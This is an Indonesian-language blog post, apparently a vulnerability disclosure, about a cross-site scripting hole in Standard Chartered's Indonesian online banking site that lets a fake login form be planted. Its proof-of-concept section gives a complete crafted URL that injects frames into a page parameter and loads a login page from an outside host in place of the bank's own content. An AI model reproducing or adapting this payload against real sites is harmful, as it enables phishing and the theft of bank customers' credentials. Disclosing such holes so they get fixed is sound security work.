Menanam Form Login Palsu Pada Web Standard Chartered Online Banking

Lagi-lagi Bank Standard Chartered memiliki celah XSS yang cukup serius. Celah ini memungkinkan phisher untuk membuat form login palsu pada area Online Banking. Sama dengan celah-celah XSS pada umumnya, tidak ada kerusakan yang akan ditimbulkan pada sisi Standard Chartered. Hanya saja, apabila celah ini dibiarkan, tinggal menunggu waktu ada orang jahat yang memanfaatkan celah ini untuk melakukan aksi penipuan dengan berbekal penyingkat URL, jejaring sosial, email, atau instant messenger.

Contoh Hasil Form Login Palsu

Standard Chatered Online Banking XSSED by SPYRO KiD

POC

1

https://id.online.standardchartered.com/Init/IBank?ser=100&act=MainFrame_ID.jsp&ccode=ID.jsp%22%20name=%22logoFrame%22%20scrolling=%22no%22%20noresize=%22noresize%22%20id=%22logoFrame%22%20title=%22Logo%20Frame%22%20marginheight=%220%22%20marginwidth=%220%22%20frameborder=%220%22%3E%3Cframe%20src=%27/scb/newGUI/blank.html%27%20NAME=loginDateFrame%20scrolling=%22no%22%20noresize=%22noresize%22%20id=%22loginDateFrame%22%20title=%22Date%20Frame%22%20marginheight=%220%22%20marginwidth=%220%22%20frameborder=%220%22%3E%3Cframe%20src=%27http://www.spyrozone.net/playground/StandardChartered/CenterContent.html%27%20NAME=%22CenterContent%22%20scrolling=%22no%22%20noresize=%22noresize%22%20style=%22overflow-x:hidden;%22%20id=%22CenterContent%22%20title=%22Date%20Frame%22%20marginheight=%220%22%20marginwidth=%220%22%20frameborder=%220%22%20%3E%3Cnoscript%3E

//E.O.F